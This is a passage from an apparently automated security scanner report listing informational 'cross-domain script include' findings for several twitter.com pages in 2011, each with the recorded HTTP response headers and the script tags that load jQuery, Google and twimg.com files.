<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.338. http://twitter.com/tos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/tos

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664309-96826-22721
ETag: "3578b323c4cba21e462682fa9b8e39ef"
Last-Modified: Wed, 02 Feb 2011 16:31:49 GMT
X-Runtime: 0.04877
Content-Type: text/html; charset=utf-8
Content-Length: 30494
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.339. https://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/fronts-https.js
https://si3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296614487

Request

Response

18.340. https://twitter.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/about

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-39741-2650
ETag: "185a712cbbe04170b42cfcfa825d496a"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.04372
Content-Type: text/html; charset=utf-8
Content-Length: 15205
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.341. https://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/about/contact

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663830-25196-21351
ETag: "d1474b551eb390afd328672c866ae2cc"
Last-Modified: Wed, 02 Feb 2011 16:23:50 GMT
X-Runtime: 0.02612
Content-Type: text/html; charset=utf-8
Content-Length: 11005
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.342. https://twitter.com/about/resources previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/about/resources

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
https://si1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/api.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-91912-42975
ETag: "82c647499a9c4824e9705c4ed7666576"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.04483
Content-Type: text/html; charset=utf-8
Content-Length: 12711
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.343. https://twitter.com/account/complete previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/account/complete

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296611148
https://si0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
https://si0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
https://si1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
https://si2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-39175-45772
ETag: "d87313621fe8eb4c3bb6e553b36a723c"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.01703
Content-Type: text/html; charset=utf-8
Content-Length: 9588
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.344. https://twitter.com/account/resend_password previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/account/resend_password

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296611148
https://si0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148
https://si0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148
https://si1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148
https://si2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-47909-42577
ETag: "cd6bf1c92ed54f9dfd3bc7dbfa4eb250"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.01790
Content-Type: text/html; charset=utf-8
Content-Length: 9771
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611148" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611148" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611148" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/geov1.js?1296611148" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296611148" type="text/javascript"></script>
...[SNIP]...

18.345. https://twitter.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-84839-37216
ETag: "f59b9932bf1f116993e288cd452bbeec"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.04626
Content-Type: text/html; charset=utf-8
Content-Length: 12742
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script src="https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.346. https://twitter.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/privacy

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-44764-23640
ETag: "e419132d97dc15ec2ccd3b01ef855c92"
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.03586
Content-Type: text/html; charset=utf-8
Content-Length: 18964
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296615671" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296615671" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296615671" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296615671" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296609216/javascripts/api.js?1296615671" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si1.twimg.com/a/1296609216/javascripts/layout_newtwitter.js?1296615671" type="text/javascript"></script>
...[SNIP]...

18.347. https://twitter.com/sessions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/sessions

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
https://api-secure.recaptcha.net/challenge?k=6LfbTAAAAAAAAE0hk8Vnfd1THHnn9lJuow6fgulO
https://si1.twimg.com/a/1296609216/javascripts/api.js?1296614487
https://si1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
https://si1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
https://si2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
https://si3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
https://si3.twimg.com/a/1296609216/javascripts/twitter-https.js
https://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:23:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663829-87611-26793
ETag: "f7c9a09b9b70412c5b165a49ec6be17f"-gzip
Last-Modified: Wed, 02 Feb 2011 16:23:49 GMT
X-Runtime: 0.03650
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlYmMzNDFlNWIw%250AZGE1NmRjYzVkYzYxOGM1ZjY5YmM4YjY6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--280770bb9518a54ec687bc362e7ec51f55189071; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 12644

